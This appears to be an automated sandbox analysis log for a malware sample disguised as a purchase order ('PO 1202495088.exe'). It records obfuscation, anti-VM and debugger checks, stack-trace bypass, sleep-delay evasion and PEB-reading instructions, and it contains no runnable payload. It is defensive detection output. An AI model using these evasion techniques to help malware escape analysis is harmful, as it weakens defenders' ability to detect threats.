                Source: 1.2.PO 1202495088.exe.4da2308.2.raw.unpack, XOlZVOoLm4JP3UJtnJ.csHigh entropy of concatenated method names: 'WO9PE0tTyS', 'X6TPt6VnVV', 'riyPgxIuTw', 'DNMPDPCKB7', 'H8vPYR9AF5', 'fg1PjS1S4Z', 'LMeP6ufuoM', 'TJ8P3rJOVs', 'tRlP1hMdrv', 'XgXPyu5ZnA'
                Source: 1.2.PO 1202495088.exe.4da2308.2.raw.unpack, k5BBnjfuXoDcUptWYL.csHigh entropy of concatenated method names: 's0ZWOyxtWL', 'JgZW4rqEUw', 'M9CW8yt5xl', 'tB3WRI4mbm', 'dOrWdrC8WN', 'G2DWlGkD25', 'yJYWw0Pk2S', 'FaeWEX4Ktk', 'k8kWtyWUr7', 'Pj2W0nTkcJ'
                Source: 1.2.PO 1202495088.exe.4da2308.2.raw.unpack, W1hFvapKrUm5wvGUxP.csHigh entropy of concatenated method names: 'QwJ8uAZGf', 'GMARiD7j1', 'iFNlAKRf6', 'ahCwjNNCI', 'TI2t5jfJN', 'lPb0y8goK', 'vrlTS2XIC6XBEx4UaU', 'caJKBmAV0BnIQ3ohOv', 'TZbhdeaGB', 'foLH4tKH8'
                Source: 1.2.PO 1202495088.exe.4da2308.2.raw.unpack, HNmpxA5pVuEotTu6A3N.csHigh entropy of concatenated method names: 'ToString', 'JINVEhuo5m', 'Mn9VtpaOgm', 'ORvV072ZZX', 'MXNVgpK5PA', 'RkHVDH4jBU', 'WpyVZCkZvp', 'CKEVYo3bhU', 'nrA5fSnIMHeyraRP6sd', 'eURcqgnGMG8CoFO3vj0'

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: PO 1202495088.exe PID: 3264, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\PO 1202495088.exeAPI/Special instruction interceptor: Address: 7FFC9B32D144
                Source: C:\Users\user\Desktop\PO 1202495088.exeAPI/Special instruction interceptor: Address: 7FFC9B330594
                Source: C:\Users\user\Desktop\PO 1202495088.exeAPI/Special instruction interceptor: Address: 7FFC9B32FF74
                Source: C:\Users\user\Desktop\PO 1202495088.exeAPI/Special instruction interceptor: Address: 7FFC9B32D6C4
                Source: C:\Users\user\Desktop\PO 1202495088.exeAPI/Special instruction interceptor: Address: 7FFC9B32D864
                Source: C:\Users\user\Desktop\PO 1202495088.exeAPI/Special instruction interceptor: Address: 7FFC9B32D004
                Source: C:\Windows\SysWOW64\cttune.exeAPI/Special instruction interceptor: Address: 7FFC9B32D144
                Source: C:\Windows\SysWOW64\cttune.exeAPI/Special instruction interceptor: Address: 7FFC9B330594
                Source: C:\Windows\SysWOW64\cttune.exeAPI/Special instruction interceptor: Address: 7FFC9B32D764
                Source: C:\Windows\SysWOW64\cttune.exeAPI/Special instruction interceptor: Address: 7FFC9B32D324
                Source: C:\Windows\SysWOW64\cttune.exeAPI/Special instruction interceptor: Address: 7FFC9B32D364
                Source: C:\Windows\SysWOW64\cttune.exeAPI/Special instruction interceptor: Address: 7FFC9B32D004
                Source: C:\Windows\SysWOW64\cttune.exeAPI/Special instruction interceptor: Address: 7FFC9B32FF74
                Source: C:\Windows\SysWOW64\cttune.exeAPI/Special instruction interceptor: Address: 7FFC9B32D6C4
                Source: C:\Windows\SysWOW64\cttune.exeAPI/Special instruction interceptor: Address: 7FFC9B32D864
                Source: C:\Windows\SysWOW64\cttune.exeAPI/Special instruction interceptor: Address: 7FFC9B32D604
                Source: C:\Users\user\Desktop\PO 1202495088.exeMemory allocated: 30E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeMemory allocated: 32F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeMemory allocated: 3200000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeMemory allocated: 7610000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeMemory allocated: 73C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeMemory allocated: 8610000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeMemory allocated: 9610000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeMemory allocated: 9C90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeMemory allocated: AC90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeMemory allocated: BC90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F088E rdtsc 4_2_013F088E
                Source: C:\Users\user\Desktop\PO 1202495088.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9891Jump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeWindow / User API: threadDelayed 9010Jump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeAPI coverage: 0.9 %
                Source: C:\Windows\SysWOW64\cttune.exeAPI coverage: 1.2 %
                Source: C:\Users\user\Desktop\PO 1202495088.exe TID: 6520Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 8164Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 8164Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exe TID: 4604Thread sleep count: 121 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\cttune.exe TID: 4604Thread sleep time: -242000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exe TID: 4604Thread sleep count: 9010 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\cttune.exe TID: 4604Thread sleep time: -18020000s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\cttune.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\cttune.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\PO 1202495088.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: cttune.exe, 0000000D.00000002.5164151299.0000000000A2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8%
                Source: svchost.exe, 00000005.00000002.2810649508.0000019710C2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2811638902.0000019712A8A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: RAVCpl64.exe, 0000000C.00000002.6023320598.00000000004FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll"
                Source: firefox.exe, 0000000E.00000002.1753371044.0000020832F88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F088E rdtsc 4_2_013F088E
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_00417EB3 LdrLoadDll,4_2_00417EB3
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E0118 mov eax, dword ptr fs:[00000030h]4_2_013E0118
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B6179 mov eax, dword ptr fs:[00000030h]4_2_013B6179
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E415F mov eax, dword ptr fs:[00000030h]4_2_013E415F
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0143A130 mov eax, dword ptr fs:[00000030h]4_2_0143A130
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013AA147 mov eax, dword ptr fs:[00000030h]4_2_013AA147
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013AA147 mov eax, dword ptr fs:[00000030h]4_2_013AA147
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013AA147 mov eax, dword ptr fs:[00000030h]4_2_013AA147
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E41BB mov ecx, dword ptr fs:[00000030h]4_2_013E41BB
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E41BB mov eax, dword ptr fs:[00000030h]4_2_013E41BB
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E41BB mov eax, dword ptr fs:[00000030h]4_2_013E41BB
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EE1A4 mov eax, dword ptr fs:[00000030h]4_2_013EE1A4
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EE1A4 mov eax, dword ptr fs:[00000030h]4_2_013EE1A4
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014781EE mov eax, dword ptr fs:[00000030h]4_2_014781EE
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014781EE mov eax, dword ptr fs:[00000030h]4_2_014781EE
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B4180 mov eax, dword ptr fs:[00000030h]4_2_013B4180
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B4180 mov eax, dword ptr fs:[00000030h]4_2_013B4180
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B4180 mov eax, dword ptr fs:[00000030h]4_2_013B4180
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C01F1 mov eax, dword ptr fs:[00000030h]4_2_013C01F1
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C01F1 mov eax, dword ptr fs:[00000030h]4_2_013C01F1
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C01F1 mov eax, dword ptr fs:[00000030h]4_2_013C01F1
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013A81EB mov eax, dword ptr fs:[00000030h]4_2_013A81EB
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013BA1E3 mov eax, dword ptr fs:[00000030h]4_2_013BA1E3
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013BA1E3 mov eax, dword ptr fs:[00000030h]4_2_013BA1E3
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013BA1E3 mov eax, dword ptr fs:[00000030h]4_2_013BA1E3
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013BA1E3 mov eax, dword ptr fs:[00000030h]4_2_013BA1E3
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013BA1E3 mov eax, dword ptr fs:[00000030h]4_2_013BA1E3
